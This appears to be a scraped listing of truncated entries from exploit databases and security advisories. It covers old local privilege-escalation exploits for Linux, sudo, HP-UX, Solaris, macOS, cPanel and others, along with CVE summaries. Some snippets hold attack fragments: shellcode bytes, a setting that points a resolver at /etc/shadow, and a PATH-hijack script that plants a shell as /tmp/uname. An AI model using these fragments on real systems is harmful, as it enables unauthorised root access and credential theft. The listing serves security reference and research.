Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit

No description provided by source. / Linux kernel ptrace/kmod local root exploit This code exploits a race condition in kernel/kmod.c, which creates kernel thread in insecure manner. This bug allows to ptrace cloned process, allowing to take control over privileged modprobe binary. Should work...

Sudo 1.3.1 - 1.6.8p Pathname Validation Local Root Exploit (openbsd)

No description provided by source. include stdio.h include stdlib.h include unistd.h include sysexits.h include sys/wait.h define SUDO "/usr/bin/sudo" ifdef BUFSIZ undef BUFSIZ define BUFSIZ 128 endif / ANY MODIFIED REPUBLISHING IS RESTRICTED OpenBSD sudo 1.3.1 - 1.6.8p local root exploit Tested...

Resolv+ (RESOLV_HOST_CONF) Linux Library Local Exploit

No description provided by source. setenv RESOLVHOSTCONF /etc/shadow; ping adfas...

htpasswd Apache 1.3.31 Local Exploit

No description provided by source. !/usr/bin/perl Proof Of Concept exploit for htpasswd of Apache. Read the advisory for more information. - Luiz Fernando Camargo - foxtrotatflowsecurity.org $shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"...

HP-UX 11i (swask) Format String Local Root Exploit

No description provided by source. / HP-UX swask format string local root exploit ============================================ HP-UX 'swask' contains an exploitable format string vulnerability. The 'swask' utility is installed setuid root by default. Specifically the vulnerability is in the...

NVIDIA UNIX driver -- arbitrary root code execution vulnerability

Rapid7 reports: The NVIDIA Binary Graphics Driver for Linux is vulnerable to a buffer overflow that allows an attacker to run arbitrary code as root. This bug can be exploited both locally or remotely via a remote X client or an X client which visits a malicious web page. A working proof-of-conce...

Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit

No description provided by source. !/bin/sh $Id: raptorlibnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $ raptorlibnspr - Solaris 10 libnspr oldschool local root Copyright c 2006 Marco Ivaldi [email protected] Local exploitation of a design error vulnerability in version 4.6.1 of NSPR, as includ...

cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit (php)

Exploit for unknown platform in category local exploits ================================================================= cPanel cPanel Sorry Safe-mode Is On Script Not Work On This Server "; echo "Powered By Ashiyane Security Corporation www.Ashiyane.ir"; exit; $disablef =...

Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit

Exploit for solaris platform in category local exploits =============================================================== Solaris 10 libnspr Arbitrary File Creation Local Root Exploit =============================================================== !/bin/sh $Id: raptorlibnspr,v 1.1 2006/10/13 19:12:...

Mac OS X <= 10.4.7 Mach Exception Handling Local Exploit (10.3.x 0day)

Exploit for macOS platform in category local exploits ====================================================================== Mac OS X = 10.4.7 Mach Exception Handling Local Exploit 10.3.x 0day ====================================================================== / excploit.c - 28 Nov 2005 -...

Apple Mac OSX 10.4.7 - Mach Exception Handling Local (10.3.x)

Apple Mac OSX 10.4.7 - Mach Exception Handling Local 10.3.x / excploit.c - 28 Nov 2005 - [email protected] Exploitable Mach Exception Handling Affected: Mac OS X 10.4.6 darwin 8.6.0 and older When a process executes a setuid executable, all existing rights to the task port are invalidated,...

Mac OS X &lt;= 10.4.7 Mach Exception Handling Local Exploit (10.3.x 0day)

No description provided by source. / excploit.c - 28 Nov 2005 - [email protected] Exploitable Mach Exception Handling Affected: Mac OS X 10.4.6 darwin 8.6.0 and older When a process executes a setuid executable, all existing rights to the task port are invalidated, to make sure unauthorize...

Apple Mac OSX 10.4.7 - Mach Exception Handling Local (10.3.x)

/ excploit.c - 28 Nov 2005 - [email protected] Exploitable Mach Exception Handling Affected: Mac OS X 10.4.6 darwin 8.6.0 and older When a process executes a setuid executable, all existing rights to the task port are invalidated, to make sure unauthorized processes do not retain control o...

CORE-2006-0322: Multiple vulnerabilities in ICQ Toolbar 1.3 for Internet Explorer

Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Multiple vulnerabilities in ICQ Toolbar 1.3 for Internet Explorer Date Published: 2006-09-07 Last Update: 2006-09-06 Advisory ID: CORE-2006-0322 Bugtraq ID: None currently assigned CVE Name: None currently assign...

CVE-2006-4522

The CVE-2006-4522 entry concerns IBM AIX 5.2 and 5.3, where the dtterm component is affected. The vulnerability allows a local user to execute arbitrary code with root privileges via unspecified vectors/vulnerabilities in dtterm. No concrete exploit details, affected versions beyond the stated AI...

TIBCO Rendezvous <= 7.4.11 Password Extractor Local Exploit

Exploit for unknown platform in category local exploits =========================================================== TIBCO Rendezvous tibco.exe c:\rvrd.db Tibco RendezVous Password Dumper Affected versions =v7.4.11 Author: Andres Tarasco atarasco @ sia.es Url: http://www.514.es + Tibco Logfile...

CVE-2006-4306

CVE-2006-4306 concerns Solaris 8 and 9 prior to 2006-08-21. The NVD entry describes an unspecified vulnerability that allows local users to execute arbitrary commands, leveraging the default RBAC (Role-Based Access Control) settings in the File System Management profile. The precise vector is not...

gotpwnedagainmail.sh.txt

!/bin/sh http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom Previously undisclosed local fetchmail issue. This takes setgid=6 http://docs.info.apple.com/article.html?artnum=106704 export PATH=/tmp:$PATH echo /bin/sh -i /tmp/uname chmod +x /tmp/uname /usr/bin/fetchmail -V...

KLA10136 OSI vulnerability in DeviceLock

Improper ACL enforcing was found in DeviceLock. By exploiting this vulnerability malicious users can obtain sensitive information. This vulnerability can be exploited locally. Original advisories - Related products DeviceLock CVE list CVE-2006-4184 warning Solution Update to latest version Impact...

[UNIX] Liblesstif Local Root &#40;Exploit&#41;

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...